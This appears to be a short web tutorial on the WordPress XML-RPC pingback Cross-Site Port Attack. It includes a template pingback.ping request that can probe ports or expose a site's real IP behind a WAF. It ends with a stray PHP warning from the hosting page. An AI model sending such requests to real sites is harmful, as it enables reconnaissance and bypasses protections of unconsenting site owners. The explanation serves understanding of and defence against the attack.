WordPress Cross-Site Port Attack (XSPA)

Cross-site Port Attacks (XSPA) are very common in which the hacker injects the malicious script to retrieve information on TCP ports and IP addresses. In the case of WordPress, XMLRPC is used along with its pingback mechanism to bypass any IP masking such as basic WAF like Cloudflare.

In an XSPA attack, the hacker uses pingback. ping method to pingback a post on a target website which in return sends the IP address in response. Hacker uses a sniffer to create the endpoint for sending the pingback and a live URL of a blog post.

Hackers send the following request from her server.

<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>

If the response contains a fault code and a value greater than 0 then it means the port is open for you to start sending the HTTP packets directly.


Warning: file_get_contents(http://api.wipmania.com/18.204.48.64?[YOUR SITE URL]): failed to open stream: Connection refused in /var/www/vhosts/amberit.eu/httpdocs/wp-content/themes/amberit/inc/layout-functions.php on line 821